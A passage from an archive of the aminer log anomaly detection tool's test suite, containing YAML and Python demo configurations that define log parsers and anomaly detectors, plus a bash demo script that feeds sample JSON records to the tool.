PathDependentHistogramAnalysis path: "/model/RandomTime" bin_definition: "modulo_time_bin_definition" report_interval: 10 - type: MatchValueAverageChangeDetector id: MatchValueAverageChange timestamp_path: null paths: - "/model/Random" min_bin_elements: 100 min_bin_time: 10 - type: MatchValueStreamWriter id: MatchValueStreamWriter stream: "sys.stdout" paths: - "/model/Sensors/CPUTemp" - "/model/Sensors/CPUWorkload" - "/model/Sensors/DTM" separator: ";" missing_value_string: "" - type: NewMatchPathValueComboDetector id: NewMatchPathValueCombo paths: - "/model/IPAddresses/Username" - "/model/IPAddresses/IP" learn_mode: True - type: NewMatchIdValueComboDetector id: NewMatchIdValueComboDetector paths: - "/model/type/path/name" - "/model/type/syscall/syscall" id_path_list: - "/model/type/path/id" - "/model/type/syscall/id" min_allowed_time_diff: 5 allow_missing_values: True learn_mode: True - type: NewMatchPathValueDetector id: NewMatchPathValue paths: - "/model/DailyCron/JobNumber" - "/model/IPAddresses/Username" learn_mode: True - type: MissingMatchPathValueDetector id: MissingMatch paths: - "/model/DiskReport/Space" check_interval: 2 realert_interval: 5 learn_mode: True - type: TimeCorrelationDetector id: TimeCorrelationDetector parallel_check_count: 2 min_rule_attributes: 1 max_rule_attributes: 5 record_count_before_event: 10000 - type: CorrelationRule rule_id: correlation_rule min_time_delta: 5 max_time_delta: 6 artefact_match_parameters: [["/model/CronAnnouncement/JobNumber", "/model/CronExecution/JobNumber"]] - type: EventClassSelector action_id: a_class_selector artefact_a_rules: - correlation_rule - type: EventClassSelector action_id: b_class_selector artefact_b_rules: - correlation_rule - type: PathExistsMatchRule id: path_exists_match_rule3 path: "/model/CronAnnouncement/Run" match_action: a_class_selector - type: PathExistsMatchRule id: path_exists_match_rule4 path: "/model/CronExecution/Job" match_action: b_class_selector - type: TimeCorrelationViolationDetector id: TimeCorrelationViolationDetector ruleset: - path_exists_match_rule3 - path_exists_match_rule4 EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminer/jsonConverterHandler-demo-config.py000066400000000000000000000747721437606560100321230ustar00rootroot00000000000000from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement, MultiLocaleDateTimeModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.Base64StringModelElement import Base64StringModelElement from aminer.parsing.ElementValueBranchModelElement import ElementValueBranchModelElement from aminer.parsing.HexStringModelElement import HexStringModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.WhiteSpaceLimitedDataModelElement import WhiteSpaceLimitedDataModelElement # This is a template for the "aminer" logfile miner tool. Copy # it to "config.py" and define your ruleset. config_properties = {} # skipcq: PY-W0072 # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # skipcq: BAN-B108 # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'root@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ date_format_string = b'%Y-%m-%d %H:%M:%S' cron = b' cron[' # Build the parsing model: service_children_disk_report = [ FixedDataModelElement('Space', b' Current Disk Data is: Filesystem Type Size Used Avail Use%'), DelimitedDataModelElement('Data', b'%'), AnyByteDataModelElement('Rest')] service_children_login_details = [ FixedDataModelElement('User/LoginDetails', b'User '), DelimitedDataModelElement('Username', b' '), FixedWordlistDataModelElement('Status', [b' logged in', b' logged out']), OptionalMatchModelElement('PastTime', SequenceModelElement('Time', [ FixedDataModelElement('Blank', b' '), DecimalIntegerValueModelElement('Minutes'), FixedDataModelElement('Ago', b' minutes ago.')]))] service_children_cron_job = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('UNameSpace1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('UNameSpace2', b' '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Details', b']: Job `cron.daily` started.')] service_children_random_time = [FixedDataModelElement('Space', b'Random: '), DecimalIntegerValueModelElement('Random')] service_children_sensors = [SequenceModelElement('CPUTemp', [ FixedDataModelElement('FixedTemp', b'CPU Temp: '), DecimalIntegerValueModelElement('Temp'), FixedDataModelElement('Degrees', b'\xc2\xb0C')]), FixedDataModelElement('Space1', b', '), SequenceModelElement('CPUWorkload', [ FixedDataModelElement('FixedWorkload', b'CPU Workload: '), DecimalIntegerValueModelElement('Workload'), FixedDataModelElement('Percent', b'%')]), FixedDataModelElement('Space2', b', '), DateTimeModelElement('DTM', date_format_string)] service_children_user_ip_address = [ FixedDataModelElement('User/UserIPAddress', b'User '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Action', b' changed IP address to '), IpAddressDataModelElement('IP')] service_children_cron_job_announcement = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('Space', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Run', b']: Will run job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('StartTime', b'\' in 5 min.')] service_children_cron_job_execution = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('Space1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Job', b']: Job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('Started', b'\' started')] service_children_audit = [SequenceModelElement('path', [ FixedDataModelElement('type', b'type=PATH '), FixedDataModelElement('msg_audit', b'msg=audit('), DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('item_string', b'): item='), DecimalIntegerValueModelElement('item'), FixedDataModelElement('name_string', b' name="'), DelimitedDataModelElement('name', b'"'), FixedDataModelElement('inode_string', b'" inode='), DecimalIntegerValueModelElement('inode'), FixedDataModelElement('dev_string', b' dev='), DelimitedDataModelElement('dev', b' '), FixedDataModelElement('mode_string', b' mode='), DecimalIntegerValueModelElement('mode', value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), FixedDataModelElement('ouid_string', b' ouid='), DecimalIntegerValueModelElement('ouid'), FixedDataModelElement('ogid_string', b' ogid='), DecimalIntegerValueModelElement('ogid'), FixedDataModelElement('rdev_string', b' rdev='), DelimitedDataModelElement('rdev', b' '), FixedDataModelElement('nametype_string', b' nametype='), FixedWordlistDataModelElement('nametype', [b'NORMAL', b'ERROR'])]), SequenceModelElement('syscall', [ FixedDataModelElement('type', b'type=SYSCALL '), FixedDataModelElement('msg_audit', b'msg=audit('), DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('arch_string', b'): arch='), DelimitedDataModelElement('arch', b' '), FixedDataModelElement('syscall_string', b' syscall='), DecimalIntegerValueModelElement('syscall'), FixedDataModelElement('success_string', b' success='), FixedWordlistDataModelElement('success', [b'yes', b'no']), FixedDataModelElement('exit_string', b' exit='), DecimalIntegerValueModelElement('exit'), AnyByteDataModelElement('remainding_data')])] service_children_parsing_model_element = [ DateTimeModelElement('DateTimeModelElement', b'Current DateTime: %d.%m.%Y %H:%M:%S'), DecimalFloatValueModelElement('DecimalFloatValueModelElement', value_sign_type='optional'), DecimalIntegerValueModelElement('DecimalIntegerValueModelElement', value_sign_type='optional', value_pad_type='blank'), SequenceModelElement('se', [ DelimitedDataModelElement('DelimitedDataModelElement', b';'), FixedDataModelElement('FixedDataModelElement', b';')])] # ElementValueBranchModelElement fixed_data_me1 = FixedDataModelElement("fixed1", b'match ') fixed_data_me2 = FixedDataModelElement("fixed2", b'fixed String') fixed_wordlist_data_model_element = FixedWordlistDataModelElement("wordlist", [b'data: ', b'string: ']) decimal_integer_value_model_element = DecimalIntegerValueModelElement("decimal") service_children_parsing_model_element.append( ElementValueBranchModelElement('ElementValueBranchModelElement', FirstMatchModelElement("first", [ SequenceModelElement("seq1", [fixed_data_me1, fixed_wordlist_data_model_element]), SequenceModelElement("seq2", [fixed_data_me1, fixed_wordlist_data_model_element, fixed_data_me2])]), "wordlist", {0: decimal_integer_value_model_element, 1: fixed_data_me2})) service_children_parsing_model_element.append(HexStringModelElement('HexStringModelElement')) service_children_parsing_model_element.append(SequenceModelElement('se2', [ FixedDataModelElement('FixedDataModelElement', b'Gateway IP-Address: '), IpAddressDataModelElement('IpAddressDataModelElement')])) import locale loc = locale.getlocale() if loc == (None, None): loc = ('en_US', 'utf8') service_children_parsing_model_element.append( MultiLocaleDateTimeModelElement('MultiLocaleDateTimeModelElement', [(b'%b %d %Y', None, '%s.%s' % loc)])) service_children_parsing_model_element.append( RepeatedElementDataModelElement('RepeatedElementDataModelElement', SequenceModelElement('SequenceModelElement', [ FixedDataModelElement('FixedDataModelElement', b'[drawn number]: '), DecimalIntegerValueModelElement('DecimalIntegerValueModelElement')]), 1)) service_children_parsing_model_element.append(VariableByteDataModelElement('VariableByteDataModelElement', b'-@#')) service_children_parsing_model_element.append(SequenceModelElement('se', [ WhiteSpaceLimitedDataModelElement('WhiteSpaceLimitedDataModelElement'), FixedDataModelElement('fixed', b' ')])) # The Base64StringModelElement must be just before the AnyByteDataModelElement to avoid unexpected Matches. service_children_parsing_model_element.append(Base64StringModelElement('Base64StringModelElement')) # The OptionalMatchModelElement must be paired with a FirstMatchModelElement because it accepts all data and thus no data gets # to the AnyByteDataModelElement. The AnyByteDataModelElement must be last, because all bytes are accepted. service_children_parsing_model_element.append( OptionalMatchModelElement('/', FirstMatchModelElement('FirstMatchModelElement//optional', [ FixedDataModelElement('FixedDataModelElement', b'The-searched-element-was-found!'), SequenceModelElement('se', [ FixedDataModelElement('FixedDME', b'Any:'), AnyByteDataModelElement('AnyByteDataModelElement')])]))) alphabet = b'ghijkl' service_children_ecd = [] for _, char in enumerate(alphabet): char = bytes([char]) service_children_ecd.append(FixedDataModelElement(char.decode(), char)) parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('CronAnnouncement', service_children_cron_job_announcement), SequenceModelElement('CronExecution', service_children_cron_job_execution), SequenceModelElement('DailyCron', service_children_cron_job), SequenceModelElement('DiskReport', service_children_disk_report), SequenceModelElement('LoginDetails', service_children_login_details), DecimalIntegerValueModelElement('Random'), SequenceModelElement('RandomTime', service_children_random_time), SequenceModelElement('Sensors', service_children_sensors), SequenceModelElement('IPAddresses', service_children_user_ip_address), FirstMatchModelElement('type', service_children_audit), FirstMatchModelElement('ECD', service_children_ecd), FirstMatchModelElement('ParsingME', service_children_parsing_model_element)]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust simple_monotonic_timestamp_adjust = SimpleMonotonicTimestampAdjust([atom_filter]) analysis_context.register_component(simple_monotonic_timestamp_adjust, component_name="SimpleMonotonicTimestampAdjust") from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler from aminer.events.JsonConverterHandler import JsonConverterHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) json_converter_handler = JsonConverterHandler([stream_printer_event_handler], analysis_context) anomaly_event_handlers = [json_converter_handler] # Now define the AtomizerFactory using the model. A simple line based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory(parsing_model, [simple_monotonic_timestamp_adjust], anomaly_event_handlers) # Just report all unparsed atoms to the event handlers. from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler, VerboseUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=False) analysis_context.register_component(simple_unparsed_atom_handler, component_name="SimpleUnparsedHandler") verbose_unparsed_atom_handler = VerboseUnparsedAtomHandler(anomaly_event_handlers, parsing_model) atom_filter.add_handler(verbose_unparsed_atom_handler, stop_when_handled_flag=True) analysis_context.register_component(verbose_unparsed_atom_handler, component_name="VerboseUnparsedHandler") from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector timestamps_unsorted_detector = TimestampsUnsortedDetector(analysis_context.aminer_config, anomaly_event_handlers) atom_filter.add_handler(timestamps_unsorted_detector) analysis_context.register_component(timestamps_unsorted_detector, component_name="TimestampsUnsortedDetector") from aminer.analysis import Rules from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector allowlist_rules = [ Rules.OrMatchRule([ Rules.AndMatchRule([ Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root')), Rules.DebugMatchRule(debug_match_result=True)]), Rules.AndMatchRule([ Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')), Rules.PathExistsMatchRule('/model/LoginDetails'), Rules.DebugMatchRule(debug_match_result=True)]), Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])] # This rule list should trigger, when the line does not look like: User root (logged in, logged out) # or User 'username' (logged in, logged out) x minutes ago. allowlist_violation_detector = AllowlistViolationDetector(analysis_context.aminer_config, allowlist_rules, anomaly_event_handlers, output_logline=True) analysis_context.register_component(allowlist_violation_detector, component_name="Allowlist") atom_filter.add_handler(allowlist_violation_detector) from aminer.analysis.ParserCount import ParserCount parser_count = ParserCount(analysis_context.aminer_config, None, anomaly_event_handlers, 10) analysis_context.register_component(parser_count, component_name="ParserCount") atom_filter.add_handler(parser_count) from aminer.analysis.EventTypeDetector import EventTypeDetector etd = EventTypeDetector(analysis_context.aminer_config, anomaly_event_handlers) analysis_context.register_component(etd, component_name="EventTypeDetector") atom_filter.add_handler(etd) from aminer.analysis.VariableTypeDetector import VariableTypeDetector vtd = VariableTypeDetector(analysis_context.aminer_config, anomaly_event_handlers, etd, silence_output_except_indicator=False, output_logline=False, ignore_list=["/model/RandomTime"]) analysis_context.register_component(vtd, component_name="VariableTypeDetector") atom_filter.add_handler(vtd) from aminer.analysis.VariableCorrelationDetector import VariableCorrelationDetector vtd = VariableCorrelationDetector(analysis_context.aminer_config, anomaly_event_handlers, etd, disc_div_thres=0.5, ignore_list=["/model/RandomTime"]) analysis_context.register_component(vtd, component_name="VariableCorrelationDetector") atom_filter.add_handler(vtd) from aminer.analysis.EventCorrelationDetector import EventCorrelationDetector ecd = EventCorrelationDetector(analysis_context.aminer_config, anomaly_event_handlers, check_rules_flag=True, hypothesis_max_delta_time=1.0) analysis_context.register_component(ecd, component_name="EventCorrelationDetector") atom_filter.add_handler(ecd) from aminer.analysis.EventFrequencyDetector import EventFrequencyDetector efd = EventFrequencyDetector(analysis_context.aminer_config, anomaly_event_handlers, window_size=0.1) analysis_context.register_component(efd, component_name="EventFrequencyDetector") atom_filter.add_handler(efd) from aminer.analysis.EventSequenceDetector import EventSequenceDetector esd = EventSequenceDetector(analysis_context.aminer_config, anomaly_event_handlers, ['/model/ParsingME'], ignore_list=[ '/model/ECD/g', '/model/ECD/h', '/model/ECD/i', '/model/ECD/j', '/model/ECD/k', '/model/ECD/l', '/model/Random', '/model/RandomTime', '/model/DailyCron']) analysis_context.register_component(esd, component_name="EventSequenceDetector") atom_filter.add_handler(esd) from aminer.analysis.MatchFilter import MatchFilter match_filter = MatchFilter(analysis_context.aminer_config, ['/model/Random'], anomaly_event_handlers, target_value_list=[ 1, 10, 100], output_logline=True) analysis_context.register_component(match_filter, component_name="MatchFilter") atom_filter.add_handler(match_filter) from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True, output_logline=True) analysis_context.register_component(new_match_path_detector, component_name="NewMatchPath") atom_filter.add_handler(new_match_path_detector) def tuple_transformation_function(match_value_list): """Only allow output of the EnhancedNewMatchPathValueComboDetector after every 10th element.""" extra_data = enhanced_new_match_path_value_combo_detector.known_values_dict.get(tuple(match_value_list)) if extra_data is not None: mod = 10 if (extra_data[2] + 1) % mod == 0: enhanced_new_match_path_value_combo_detector.learn_mode = False else: enhanced_new_match_path_value_combo_detector.learn_mode = True return match_value_list from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/DailyCron/UName', '/model/DailyCron/JobNumber'], anomaly_event_handlers, learn_mode=True, tuple_transformation_function=tuple_transformation_function, output_logline=True) analysis_context.register_component(enhanced_new_match_path_value_combo_detector, component_name="EnhancedNewValueCombo") atom_filter.add_handler(enhanced_new_match_path_value_combo_detector) import re ip_match_action = Rules.EventGenerationMatchAction( "Analysis.Rules.IPv4InRFC1918MatchRule", "Private IP address occurred!", anomaly_event_handlers) vdmt = Rules.ValueDependentModuloTimeMatchRule(None, 3, ["/model/ECD/j", "/model/ECD/k", "/model/ECD/l"], {b"e": [0, 2.95]}, [0, 3]) mt = Rules.ModuloTimeMatchRule(None, 3, 0, 3, None) time_allowlist_rules = [ Rules.AndMatchRule([ Rules.ParallelMatchRule([ Rules.ValueDependentDelegatedMatchRule([ '/model/ECD/g', '/model/ECD/h', '/model/ECD/i', '/model/ECD/j', '/model/ECD/k', '/model/ECD/l'], { (b"a",): mt, (b"b",): mt, (b"c",): mt, (b"d",): vdmt, (b"e",): vdmt, (b"f",): vdmt, None: mt}, mt), Rules.IPv4InRFC1918MatchRule("/model/ParsingME/se2/IpAddressDataModelElement", ip_match_action), Rules.DebugHistoryMatchRule(debug_match_result=True) ]), # IP addresses 8.8.8.8, 8.8.4.4 and 10.0.0.0 - 10.255.255.255 are not allowed Rules.NegationMatchRule(Rules.ValueListMatchRule("/model/ParsingME/se2/IpAddressDataModelElement", [134744072, 134743044])), Rules.NegationMatchRule(Rules.ValueRangeMatchRule("/model/ParsingME/se2/IpAddressDataModelElement", 167772160, 184549375)), Rules.NegationMatchRule(Rules.StringRegexMatchRule("/model/type/syscall/success", re.compile(b"^no$"))) ]) ] time_allowlist_violation_detector = AllowlistViolationDetector( analysis_context.aminer_config, time_allowlist_rules, anomaly_event_handlers, output_logline=True) analysis_context.register_component(time_allowlist_violation_detector, component_name="TimeAllowlist") atom_filter.add_handler(time_allowlist_violation_detector) from aminer.analysis.HistogramAnalysis import HistogramAnalysis, LinearNumericBinDefinition, ModuloTimeBinDefinition, \ PathDependentHistogramAnalysis modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, True) linear_numeric_bin_definition = LinearNumericBinDefinition(50, 5, 20, True) histogram_analysis = HistogramAnalysis(analysis_context.aminer_config, [ ('/model/RandomTime/Random', modulo_time_bin_definition), ('/model/Random', linear_numeric_bin_definition)], 10, anomaly_event_handlers, output_logline=True) analysis_context.register_component(histogram_analysis, component_name="HistogramAnalysis") atom_filter.add_handler(histogram_analysis) path_dependent_histogram_analysis = PathDependentHistogramAnalysis( analysis_context.aminer_config, '/model/RandomTime', modulo_time_bin_definition, 10, anomaly_event_handlers, output_logline=True) analysis_context.register_component(path_dependent_histogram_analysis, component_name="PathDependentHistogramAnalysis") atom_filter.add_handler(path_dependent_histogram_analysis) from aminer.analysis.MatchValueAverageChangeDetector import MatchValueAverageChangeDetector match_value_average_change_detector = MatchValueAverageChangeDetector(analysis_context.aminer_config, anomaly_event_handlers, None, [ '/model/Random'], 100, 10, output_logline=True) analysis_context.register_component(match_value_average_change_detector, component_name="MatchValueAverageChange") atom_filter.add_handler(match_value_average_change_detector) import sys from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter match_value_stream_writer = MatchValueStreamWriter( sys.stdout, ['/model/Sensors/CPUTemp', '/model/Sensors/CPUWorkload', '/model/Sensors/DTM'], b';', b'') analysis_context.register_component(match_value_stream_writer, component_name="MatchValueStreamWriter") atom_filter.add_handler(match_value_stream_writer) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector( analysis_context.aminer_config, ['/model/IPAddresses/Username', '/model/IPAddresses/IP'], anomaly_event_handlers, output_logline=True) analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewMatchPathValueCombo") atom_filter.add_handler(new_match_path_value_combo_detector) from aminer.analysis.NewMatchIdValueComboDetector import NewMatchIdValueComboDetector new_match_id_value_combo_detector = NewMatchIdValueComboDetector(analysis_context.aminer_config, [ '/model/type/path/name', '/model/type/syscall/syscall'], anomaly_event_handlers, id_path_list=[ '/model/type/path/id', '/model/type/syscall/id'], min_allowed_time_diff=5, learn_mode=True, allow_missing_values_flag=True, output_logline=True) analysis_context.register_component(new_match_id_value_combo_detector, component_name="NewMatchIdValueComboDetector") atom_filter.add_handler(new_match_id_value_combo_detector) from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector new_match_path_value_detector = NewMatchPathValueDetector(analysis_context.aminer_config, [ '/model/DailyCron/JobNumber', '/model/IPAddresses/Username'], anomaly_event_handlers, learn_mode=True, output_logline=True) analysis_context.register_component(new_match_path_value_detector, component_name="NewMatchPathValue") atom_filter.add_handler(new_match_path_value_detector) from aminer.analysis.MissingMatchPathValueDetector import MissingMatchPathValueDetector missing_match_path_value_detector = MissingMatchPathValueDetector( analysis_context.aminer_config, ['/model/DiskReport/Space'], anomaly_event_handlers, learn_mode=True, default_interval=2, realert_interval=5, output_logline=True) analysis_context.register_component(missing_match_path_value_detector, component_name="MissingMatch") atom_filter.add_handler(missing_match_path_value_detector) from aminer.analysis.TimeCorrelationDetector import TimeCorrelationDetector time_correlation_detector = TimeCorrelationDetector( analysis_context.aminer_config, anomaly_event_handlers, 2, min_rule_attributes=1, max_rule_attributes=5, record_count_before_event=10000, output_logline=True) analysis_context.register_component(time_correlation_detector, component_name="TimeCorrelationDetector") atom_filter.add_handler(time_correlation_detector) from aminer.analysis.TimeCorrelationViolationDetector import TimeCorrelationViolationDetector, CorrelationRule, EventClassSelector cron_job_announcement = CorrelationRule('CronJobAnnouncement', 5, 6, artefact_match_parameters=[ ('/model/CronAnnouncement/JobNumber', '/model/CronExecution/JobNumber')]) a_class_selector = EventClassSelector('Announcement', [cron_job_announcement], None) b_class_selector = EventClassSelector('Execution', None, [cron_job_announcement]) rules = [Rules.PathExistsMatchRule('/model/CronAnnouncement/Run', a_class_selector), Rules.PathExistsMatchRule('/model/CronExecution/Job', b_class_selector)] time_correlation_violation_detector = TimeCorrelationViolationDetector(analysis_context.aminer_config, rules, anomaly_event_handlers, output_logline=True) analysis_context.register_component(time_correlation_violation_detector, component_name="TimeCorrelationViolationDetector") atom_filter.add_handler(time_correlation_violation_detector) logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/000077500000000000000000000000001437606560100256635ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/aminerJsonInputDemo.sh000077500000000000000000000032411437606560100321540ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh LOGFILE=/tmp/syslog sudo mkdir /tmp/lib 2> /dev/null sudo mkdir /tmp/lib/aminer 2> /dev/null sudo chown -R $USER:$USER /tmp/lib/aminer 2> /dev/null sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo mkdir /tmp/lib/aminer/log 2> /dev/null sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null sudo rm $LOGFILE 2> /dev/null echo "Demo started.." echo "" FILE=/tmp/json-input-demo-config.yml if ! test -f "$FILE"; then echo "$FILE does not exist!" exit 1 fi # start json in same line read -r -d '' VAR << END {"menu": { "id": "file", "value": "File", "popup": { "menuitem": [ {"value": "New", "onclick": "CreateNewDoc()"}, {"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"} ] } }} END echo "$VAR" >> $LOGFILE # start json in new line read -r -d '' VAR << END { "menu": { "id": "file", "value": "File", "popup": { "menuitem": [ {"value": "New", "onclick": "CreateNewDoc()"}, {"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"} ] } } } END # start everything in new line read -r -d '' VAR << END { "menu": { "id": "file", "value": "File", "popup": { "menuitem": [ { "value": "New", "onclick": "CreateNewDoc()" }, { "value": "Open", "onclick": "OpenDoc()"}, { "value": "Close", "onclick": "CloseDoc()"} ] } } } END echo "$VAR" >> $LOGFILE runAminerUntilEnd "sudo aminer --config $FILE" "$LOGFILE" "/tmp/lib/aminer/AnalysisChild/RepositioningData" "$FILE" exit $? logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/json-aminer-demo.yml000066400000000000000000000101121437606560100315450ustar00rootroot00000000000000LearnMode: True Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/json_logs/aminer.log' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: 'Original log line: ' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 1 Parser: - id: component_id type: DecimalIntegerValueModelElement name: 'component_id' - id: component_type type: FixedWordlistDataModelElement name: 'component_type' args: - 'AllowlistViolationDetector' - 'EnhancedNewMatchPathValueComboDetector' - 'EventCorrelationDetector' - 'EventFrequencyDetector' - 'EventSequenceDetector' - 'EventTypeDetector' - 'HistogramAnalysis' - 'PathDependentHistogramAnalysis' - 'MatchFilter' - 'MatchValueAverageChangeDetector' - 'MatchValueStreamWriter' - 'MissingMatchPathValueDetector' - 'MissingMatchPathListValueDetector' - 'NewMatchIdValueComboDetector' - 'NewMatchPathDetector' - 'NewMatchPathValueComboDetector' - 'NewMatchPathValueDetector' - 'ParserCount' - 'TimeCorrelationDetector' - 'TimeCorrelationViolationDetector' - 'TimestampsUnsortedDetector' - 'VariableCorrelationDetector' - 'VariableTypeDetector' - id: component_name type: VariableByteDataModelElement name: 'component_name' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789_-.' - id: message type: VariableByteDataModelElement name: 'message' args: 